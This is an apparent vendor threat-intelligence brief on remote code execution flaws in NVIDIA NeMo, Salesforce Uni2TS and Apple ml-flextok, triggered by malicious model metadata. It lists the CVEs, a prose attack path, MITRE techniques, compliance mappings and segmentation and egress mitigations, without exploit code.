Executive Summary
In January 2026, significant remote code execution (RCE) vulnerabilities were disclosed across leading open-source AI/ML Python libraries maintained by NVIDIA (NeMo), Salesforce (uni2TS), and Apple (ml-flextok). Attackers could craft malicious model files with compromised metadata; upon loading these files via vulnerable libraries, arbitrary code would execute on the host system. These vulnerabilities stemmed from insecure use of third-party serialization/configuration functions—primarily Hydra's instantiate()—without proper validation, enabling supply chain attacks on widely distributed AI models, particularly via public repositories such as HuggingFace. No in-the-wild exploits were confirmed before public disclosure; however, the affected vendors coordinated prompt patches and mitigations throughout 2025.
This incident illustrates a growing trend of software supply chain threats cascading into the AI/ML ecosystem. With increased adoption of AI and routine sharing of pretrained models, even safe-seeming formats may introduce unseen risks, underscoring the urgency for security controls, vigilance in model sourcing, and rapid adaptation of secure-by-design principles for both model creators and consumers.
Why This Matters Now
With the explosive growth of AI/ML deployment and model sharing, insecure dependencies and model formats threaten the integrity of AI supply chains. As organizations accelerate AI adoption, adversaries increasingly target overlooked entry points—such as model configuration loaders—presenting urgent risks for data exposure, lateral movement, and hidden persistence.
Attack Path Analysis
The attack began with an adversary uploading a malicious AI/ML model file containing crafted metadata to a public repository or AI model hub, targeting supply chain vulnerabilities in popular Python libraries. Upon a victim organization loading the compromised model, remote code execution was achieved due to improper sanitization of metadata within the library. The attacker then used the foothold to move laterally across workloads by leveraging east-west connections and unsegmented traffic flows. With persistence established, they established command and control by enabling outbound connections for further payload delivery or remote management. Next, the adversary exfiltrated sensitive data or proprietary model information by abusing egress paths to external systems. Finally, the attacker could disrupt AI service integrity, deploy ransomware, or corrupt models, impacting organizational operations.
Kill Chain Progression
Initial Compromise
Description
Attacker uploads a malicious AI/ML model to a public repository or shares it with the victim, embedding code in metadata to exploit the supply chain via vulnerable deserialization.
Related CVEs
CVE-2025-23304
CVSS 9.8A code injection vulnerability in NVIDIA NeMo library's model loading component allows attackers to execute arbitrary code by loading .nemo files with malicious metadata.
Affected Products:
NVIDIA NeMo – < 2.3.2
Exploit Status:
no public exploitCVE-2026-22584
CVSS 9.8A code injection vulnerability in Salesforce Uni2TS allows attackers to execute arbitrary code by leveraging executable code in non-executable files.
Affected Products:
Salesforce Uni2TS – <= 1.2.0
Exploit Status:
no public exploit
MITRE ATT&CK® Techniques
Techniques reflect AI/ML supply chain and model parsing RCE attack paths. Additional enrichment and sub-techniques may be incorporated as threat intelligence matures.
Supply Chain Compromise: Compromise Software Dependencies and Development Tools
User Execution: Malicious File
Command and Scripting Interpreter: Python
Event Triggered Execution: Windows Management Instrumentation Event Subscription
Hijack Execution Flow: DLL Side-Loading
Obfuscated Files or Information
Indicator Removal: File Deletion
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Change and Vulnerability Management Procedures
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management Framework
Control ID: Article 16
CISA Zero Trust Maturity Model 2.0 – Supply Chain (Assets Component)
Control ID: 5.2.3
NIS2 Directive – Supply Chain Security
Control ID: Article 21(2)(d)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Information Technology/IT
Critical supply chain vulnerability in AI/ML libraries affects development pipelines, requiring immediate patching of NeMo, Uni2TS, and FlexTok dependencies to prevent remote code execution.
Computer Software/Engineering
Software development teams using PyTorch-based AI frameworks face high-severity RCE risks from malicious model metadata, necessitating secure model loading practices and library updates.
Financial Services
AI-driven forecasting and analysis systems using Salesforce Morai time series models vulnerable to code execution attacks, compromising sensitive financial data and trading algorithms.
Health Care / Life Sciences
Healthcare AI applications processing medical imaging and predictive analytics exposed to supply chain attacks through compromised model files, threatening patient data confidentiality.
Sources
- Remote Code Execution With Modern AI/ML Formats and Librarieshttps://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/Verified
- Security Bulletin: NVIDIA NeMo Framework - August 2025https://nvidia.custhelp.com/app/answers/detail/a_id/5686Verified
- Salesforce Helphttps://help.salesforce.com/s/articleView?id=005239354&type=1Verified
- CVE-2025-23304 - NVDhttps://nvd.nist.gov/vuln/detail/CVE-2025-23304Verified
- CVE-2026-22584 - NVDhttps://nvd.nist.gov/vuln/detail/CVE-2026-22584Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Zero Trust segmentation, east-west traffic controls, runtime anomaly detection, and egress enforcement would have constrained the attack by limiting initial supply chain exposure, detecting unauthorized remote code execution, restricting lateral movement, and preventing data exfiltration from compromised AI workloads.
Control: Multicloud Visibility & Control
Mitigation: Improved detection of supply chain anomalies and out-of-policy model assets.
Control: Threat Detection & Anomaly Response
Mitigation: Rapid detection of anomalous process or network behaviors stemming from unauthorized code execution.
Control: East-West Traffic Security
Mitigation: Prevents lateral movement by enforcing segmentation between workloads, namespaces, and services.
Control: Egress Security & Policy Enforcement
Mitigation: Blocks unauthorized outbound connections used for command, payload staging, or remote control.
Control: Encrypted Traffic (HPE)
Mitigation: Enables inspection and control of encrypted traffic to identify and block malicious exfiltration.
Limits scope of impact to only compromised segments or workloads.
Impact at a Glance
Affected Business Functions
- AI/ML Model Deployment
- Data Processing Pipelines
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of sensitive AI/ML model data and intellectual property due to unauthorized code execution.
Recommended Actions
Key Takeaways & Next Steps
- • Apply Zero Trust segmentation to all AI/ML workloads, restricting communications to essential flows only.
- • Enforce strict egress policies and monitor outbound traffic from AI infrastructure for unauthorized connections or data exfiltration attempts.
- • Deploy runtime anomaly detection controls on AI/ML workloads to rapidly identify and respond to abnormal code execution or behavioral deviations.
- • Centralize cloud and workload visibility to monitor for unapproved model assets and detect supply chain abuses across cloud providers.
- • Regularly update and validate all open-source libraries and models, ensuring only trusted, vetted components are deployed in production environments.

